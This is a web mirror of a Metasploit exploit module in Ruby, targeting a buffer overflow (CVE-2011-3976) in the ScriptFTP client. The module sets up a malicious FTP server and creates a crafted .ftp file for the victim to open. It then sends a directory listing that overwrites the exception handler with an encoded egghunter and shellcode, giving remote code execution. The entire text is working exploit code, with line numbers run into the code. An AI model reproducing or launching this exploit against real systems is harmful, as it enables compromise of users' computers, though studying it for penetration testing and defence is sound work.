CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/windows/ftp/scriptftp_list.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GoodRanking78include Msf::Exploit::Remote::FtpServer9include Msf::Exploit::FILEFORMAT10include Msf::Exploit::Egghunter1112def initialize(info = {})13super(update_info(info,14'Name' => 'ScriptFTP LIST Remote Buffer Overflow',15'Description' => %q{16AmmSoft's ScriptFTP client is susceptible to a remote buffer overflow17vulnerability that is triggered when processing a sufficiently long18filename during a FTP LIST command resulting in overwriting the19exception handler. Social engineering of executing a specially crafted20ftp file by double click will result in connecting to our malicious21server and perform arbitrary code execution which allows the attacker to22gain the same rights as the user running ScriptFTP. This vulnerability23affects versions 3.3 and earlier.24},25'License' => MSF_LICENSE,26'Author' =>27[28'modpr0be', #Vulnerability discovery and original exploit29'TecR0c <roccogiovannicalvi[at]gmail.com>', # Metasploit module30'mr_me <steventhomasseeley[at]gmail.com>', # Metasploit module31],32'References' =>33[34[ 'CVE', '2011-3976' ],35[ 'OSVDB', '75633' ],36[ 'EDB', '17876' ],37[ 'US-CERT-VU', '440219' ]38],39'DefaultOptions' =>40{41'EXITFUNC' => 'thread',42'DisablePayloadHandler' => false43},44'Payload' =>45{46'BadChars' => "\x00\xff\x0d\x5c\x2f\x0a",47'EncoderType' => Msf::Encoder::Type::AlphanumMixed,48'EncoderOptions' =>49{50'BufferRegister' => 'EDI', # Egghunter jmp edi51}52},53'Platform' => 'win',54'Targets' =>55[56# CALL DWORD PTR SS:[EBP-4]57# scriptftp.exe - File version=Build 3/9/200958[ 'Windows XP SP3 / Windows Vista', { 'Offset' => 1746, 'Ret' => "\xd6\x41" } ],59],60'Privileged' => false,61'DisclosureDate' => '2011-10-12',62'DefaultTarget' => 0))6364register_options(65[66OptString.new('FILENAME', [ true, 'The file name.', 'msf.ftp']),67])6869end7071def setup72if datastore['SRVHOST'] == '0.0.0.0'73lhost = Rex::Socket.source_address('50.50.50.50')74else75lhost = datastore['SRVHOST']76end7778ftp_file = "OPENHOST('#{lhost}','ftp','ftp')\r\n"79ftp_file << "SETPASSIVE(ENABLED)\r\n"80ftp_file << "GETLIST($list,REMOTE_FILES)\r\n"81ftp_file << "CLOSEHOST\r\n"8283print_status("Creating '#{datastore['FILENAME']}'...")84file_create(ftp_file)85super86end878889def on_client_unknown_command(c,cmd,arg)90c.put("200 OK\r\n")91end9293def on_client_command_list(c,arg)9495conn = establish_data_connection(c)96if(not conn)97c.put("425 Can't build data connection\r\n")98return99end100101print_status(" - Data connection set up")102code = 150103c.put("#{code} Here comes the directory listing.\r\n")104105code = 226106c.put("#{code} Directory send ok.\r\n")107108eggoptions =109{110:checksum => false,111:eggtag => 'cure'112}113114hunter, egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)115116# Encode with alphamixed, then unicode mixed117[ 'x86/alpha_mixed', 'x86/unicode_mixed' ].each { |name|118enc = framework.encoders.create(name)119if name =~ /unicode/120# aligned to ESP & EAX121enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EAX' })122else123enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EDX' })124end125# NOTE: we already eliminated badchars126hunter = enc.encode(hunter, nil, nil, platform)127if name =~/alpha/128#insert getpc_stub & align EDX, unicode encoder friendly.129#Hardcoded stub is not an issue here because it gets encoded anyway130getpc_stub = "\x89\xe1\xdb\xcc\xd9\x71\xf4\x5a\x83\xc2\x41\x83\xea\x35"131hunter = getpc_stub + hunter132end133}134135unicode_nop = "\x6d" # DD BYTE PTR DS:[ECX],AL136137nseh = "\x61" << unicode_nop138seh = target.ret139140alignment = "\x54" # PUSH ESP141alignment << unicode_nop142alignment << "\x58" # POP EAX143alignment << unicode_nop144alignment << "\x05\x12\x11" # ADD EAX,11001200145alignment << unicode_nop146alignment << "\x2d\x01\x01" # SUB EAX,1000100147alignment << unicode_nop148alignment << "\x2d\x01\x10" # SUB EAX,10000100149alignment << unicode_nop150alignment << "\x50" # PUSH EAX151alignment << unicode_nop152alignment << "\xc3" # RETN153154buffer = rand_text_alpha(656)155buffer << hunter156buffer << rand_text_alpha(target['Offset']-buffer.length)157buffer << nseh158buffer << seh159buffer << alignment160buffer << rand_text_alpha(500)161buffer << egg162163print_status(" - Sending directory list via data connection")164dirlist = "-rwxr-xr-x 5 ftpuser ftpusers 512 Jul 26 2001 #{buffer}.txt\r\n"165dirlist << " 5 ftpuser ftpusers 512 Jul 26 2001 A\r\n"166dirlist << "rwxr-xr-x 5 ftpuser ftpusers 512 Jul 26 2001 #{buffer}.txt\r\n"167168conn.put(dirlist)169conn.close170return171end172end173174175